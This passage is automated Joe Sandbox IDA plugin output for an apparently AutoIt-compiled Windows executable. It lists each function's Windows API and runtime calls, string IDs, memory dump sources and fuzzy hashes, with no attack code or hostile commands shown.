                                                                                                                                                                            • _wcscat.LIBCMT ref: 00452886
                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 004528B0
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004528C8
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004528DD
                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452914
                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452925
                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452944
                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452955
                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452976
                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452987
                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452998
                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 004529A9
                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452A39
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2054058615-0
                                                                                                                                                                            • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                                                                            • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                                                                                                                            • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                                                                            • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                                                            • Opcode ID: 832d7dfe82571d46151d64c4ba74b7ae12496bc5cddea04242c0c379dd164914
                                                                                                                                                                            • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                                                                                                                            • Opcode Fuzzy Hash: 832d7dfe82571d46151d64c4ba74b7ae12496bc5cddea04242c0c379dd164914
                                                                                                                                                                            • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004701FA
                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00470371
                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00470391
                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                                                                                            • API String ID: 867697134-248962490
                                                                                                                                                                            • Opcode ID: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
                                                                                                                                                                            • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                                                                                                                            • Opcode Fuzzy Hash: 0d702e1f111dc4b461eb7f98f3a5a74387d5f37c8fb6fd827a42ca67ae032642
                                                                                                                                                                            • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 2353593579-4108050209
                                                                                                                                                                            • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                                                                            • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                                                                                                            • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                                                                            • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColor.USER32 ref: 0044A11D
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                                                                                                            • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                                                                                                            • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                                                                                                            • GetWindowDC.USER32 ref: 0044A277
                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                                                                                                            • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                                                                                                            • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1744303182-0
                                                                                                                                                                            • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                                                                            • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                                                                                                                            • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                                                                            • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __wcsicoll$__wcsnicmp
                                                                                                                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                            • API String ID: 790654849-1810252412
                                                                                                                                                                            • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                                                                            • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                                                                                                                            • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                                                                            • API String ID: 0-1896584978
                                                                                                                                                                            • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                                                                                                            • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                                                                                                                                                            • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                                                                                                            • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitVariant
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1927566239-0
                                                                                                                                                                            • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                                                                            • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                                                                                                            • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                                                                            • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                            • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                                                                                                            • IsWindow.USER32(?), ref: 0046DBDE
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                                                                                                            • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                                                                                                            • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                                                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                                                                                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                            • API String ID: 1322021666-1919597938
                                                                                                                                                                            • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                                                                            • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                                                                                                                            • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                                                                            • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 0045DF54
                                                                                                                                                                            • _wcscat.LIBCMT ref: 0045DF6C
                                                                                                                                                                            • _wcscat.LIBCMT ref: 0045DF7E
                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 0045E019
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 3201719729-438819550
                                                                                                                                                                            • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                                                                                                            • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                                                                                                                            • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                                                                                                            • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __wcsicoll$IconLoad
                                                                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                                                                            • API String ID: 2485277191-404129466
                                                                                                                                                                            • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                                                                            • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                                                                                                                            • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                                                                            • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                                                                                                                            APIs
                                                                                                                                                                            • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                                                                                                                            • strncnt.LIBCMT ref: 00428646
                                                                                                                                                                            • strncnt.LIBCMT ref: 0042865A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: strncnt$CompareErrorLastString
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1776594460-0
                                                                                                                                                                            • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                                                                            • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                                                                                                            • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                                                                            • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00454688
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00454708
                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                                                                                                                            • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0045476F
                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                                                                                                                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
